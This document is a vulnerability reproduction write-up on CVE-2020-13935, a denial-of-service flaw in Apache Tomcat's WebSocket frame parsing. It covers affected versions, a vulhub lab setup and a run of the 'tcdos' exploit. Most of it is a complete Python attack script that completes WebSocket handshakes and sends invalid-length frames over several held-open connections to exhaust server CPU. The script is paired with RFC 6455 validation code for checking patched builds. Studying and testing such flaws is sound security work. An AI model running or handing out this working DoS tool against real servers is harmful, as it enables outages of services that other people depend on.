Apache Tomcat WebSocket 拒绝服务漏洞 CVE-2020-13935.md (2.53 KB / 2021-07-04 06:01:08)
# Apache Tomcat WebSocket Denial of Service Vulnerability CVE-2020-13935

## Vulnerability Description

On 6 November 2020, 360CERT observed that `@RedTeamPentesting` had published an analysis of a `Tomcat WebSocket denial of service vulnerability`, tracked as `CVE-2020-13935`, severity `High`, CVSS score `7.5`.

An unauthenticated remote attacker can send `a number of specially crafted WebSocket frames` to a Tomcat server and cause it to stop responding. The root cause is that the payload length of a WebSocket frame was not validated correctly: a 64-bit extended length with its most significant bit set, which RFC 6455 forbids, was accepted and could drive the frame-processing code into an infinite loop, so every such connection keeps a server thread spinning at full CPU until the host can no longer serve normal requests.
    
## Affected Versions

> [!NOTE]
>
> Apache Tomcat 10.0.0-M1 to 10.0.0-M6
> Apache Tomcat 9.0.0.M1 to 9.0.36
> Apache Tomcat 8.5.0 to 8.5.56
> Apache Tomcat 7.0.27 to 7.0.104
    
## Environment Setup

The vulhub directory used below is the Ghostcat (CVE-2020-1938) environment; it is reused here because its Tomcat build falls inside the affected range and ships the `examples` webapp, whose echo WebSocket endpoint is the target of the attack.

```
git clone https://github.com/vulhub/vulhub.git
cd vulhub/tomcat/CVE-2020-1938
docker-compose up -d
```
    
## Reproduction

Visit the target and check whether the Tomcat version is within the affected range.
    
    ![](http://wikioss.peiqi.tech/vuln/tomcat-8.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
    
Record the memory and CPU usage before the attack so the effect can be compared.
    
    ![](http://wikioss.peiqi.tech/vuln/tomcat-9.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
    
[CVE-2020-13935 EXP (exploit)](https://github.com/RedTeamPentesting/CVE-2020-13935)

> [!NOTE]
>
> Building the EXP requires a Go toolchain.
    
    ![](http://wikioss.peiqi.tech/vuln/tomcat-10.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
    
If the build fails while fetching dependencies with an error like

```
go: github.com/gorilla/websocket@v1.4.2: Get "https://proxy.golang.org/github.com/gorilla/websocket/@v/v1.4.2.mod": dial tcp 172.217.160.81:443: connectex: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
```

switch the Go module proxy to a reachable mirror:

```
go env -w GOPROXY=https://goproxy.cn
```
    
Run the EXP against the echo WebSocket endpoint of the bundled `examples` webapp:

```
tcdos ws://192.168.51.133:8080/examples/websocket/echoStreamAnnotation
```
    
    ![](http://wikioss.peiqi.tech/vuln/tomcat-11.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
    
CPU load saturates: the attack succeeded.
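To make the mechanism behind the `tcdos` run concrete, the following is an added example (written for this page; it is not code from the original post or from the RedTeamPentesting tool). It builds the WebSocket frame header that triggers CVE-2020-13935, shows how the unchecked length looks to a parser that reads the 8 length bytes into a signed 64-bit integer (a Java `long`, which is how the vulnerable code saw it), and implements the RFC 6455 §5.2 checks that a patched server applies. The host, port and the `/examples/websocket/echoStreamAnnotation` path are only defaults for a lab target; the function names are this example's own.

```python
"""Added example: craft and validate WebSocket frame headers for CVE-2020-13935."""
import base64
import os
import socket
import struct
import sys
import time

OPCODE_BINARY = 0x2
MSB64 = 1 << 63        # RFC 6455 section 5.2: this bit MUST be 0 in a 64-bit length


def build_frame(payload_len, opcode=OPCODE_BINARY, mask_key=None):
    """Return a masked client frame header announcing payload_len bytes.

    No body is appended: for the DoS only the announced length matters,
    the vulnerable server never gets as far as reading a payload.
    """
    if not 0 <= payload_len < (1 << 64):
        raise ValueError("payload length must fit in 64 bits")
    if mask_key is None:
        mask_key = os.urandom(4)                # client frames must be masked (RFC 6455 section 5.1)
    if len(mask_key) != 4:
        raise ValueError("mask key must be 4 bytes")
    header = bytes([0x80 | (opcode & 0x0F)])    # FIN=1, RSV bits clear
    if payload_len < 126:
        header += bytes([0x80 | payload_len])
    elif payload_len < (1 << 16):
        header += bytes([0x80 | 126]) + struct.pack(">H", payload_len)
    else:
        header += bytes([0x80 | 127]) + struct.pack(">Q", payload_len)
    return header + mask_key


def malicious_frame(mask_key=None):
    """The trigger: a 64-bit length with the most significant bit set."""
    return build_frame(MSB64, mask_key=mask_key)


def unchecked_length(frame):
    """Length as the vulnerable parser saw it: the 8 bytes read as a signed long,
    so the MSB makes the announced length negative and the read loop never ends."""
    len7 = frame[1] & 0x7F
    if len7 < 126:
        return len7
    if len7 == 126:
        return struct.unpack(">H", frame[2:4])[0]
    return struct.unpack(">q", frame[2:10])[0]   # signed view of the 64-bit field


def checked_length(frame):
    """Length decoding with the RFC 6455 validation a patched server performs."""
    if not frame[1] & 0x80:
        raise ValueError("client frame is not masked")
    len7 = frame[1] & 0x7F
    if len7 < 126:
        return len7
    if len7 == 126:
        n = struct.unpack(">H", frame[2:4])[0]
        if n < 126:
            raise ValueError("non-minimal 16-bit length encoding")
        return n
    n = struct.unpack(">Q", frame[2:10])[0]
    if n & MSB64:
        raise ValueError("invalid 64-bit length: most significant bit set")
    if n < (1 << 16):
        raise ValueError("non-minimal 64-bit length encoding")
    return n


def accepts(frame):
    """True if a conforming parser would accept the frame header."""
    try:
        checked_length(frame)
        return True
    except ValueError:
        return False


def handshake_request(host, port, path):
    """Plain HTTP/1.1 upgrade request; the server must answer 101 before frames are sent."""
    key = base64.b64encode(os.urandom(16)).decode()
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}:{port}\r\n"
        "Upgrade: websocket\r\n"
        "Connection: Upgrade\r\n"
        f"Sec-WebSocket-Key: {key}\r\n"
        "Sec-WebSocket-Version: 13\r\n\r\n"
    ).encode()


def open_and_send(host, port, path):
    """Open one WebSocket and send a single malicious frame.

    Returns the open socket (kept open so the server thread stays stuck) or None."""
    s = socket.create_connection((host, port), timeout=5)
    s.sendall(handshake_request(host, port, path))
    resp = b""
    while b"\r\n\r\n" not in resp:
        chunk = s.recv(4096)
        if not chunk:
            s.close()
            return None
        resp += chunk
    if not resp.startswith(b"HTTP/1.1 101"):
        s.close()
        return None
    s.sendall(malicious_frame())
    return s


if __name__ == "__main__":
    # Usage: python3 ws_len_dos.py <host> [port] [path] [connections]   (lab use only)
    host = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 8080
    path = sys.argv[3] if len(sys.argv) > 3 else "/examples/websocket/echoStreamAnnotation"
    count = int(sys.argv[4]) if len(sys.argv) > 4 else 8     # one spinning thread per connection
    socks = [open_and_send(host, port, path) for _ in range(count)]
    print(f"{sum(s is not None for s in socks)}/{count} connections upgraded and sent an invalid-length frame")
    try:
        while True:                  # hold the connections open; Ctrl-C to release them
            time.sleep(1)
    except KeyboardInterrupt:
        pass
```

Each connection costs the attacker 14 bytes after the handshake, while the server burns a full core per connection; that asymmetry is why the CPU graph above saturates within seconds. `checked_length` is also the check to look for when confirming a patched build: a frame built by `malicious_frame` must be rejected with a protocol error and the connection closed, not processed.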
    
## Exploit PoC
    
    [CVE-2020-13935 EXP地址](https://github.com/RedTeamPentesting/CVE-2020-13935)
    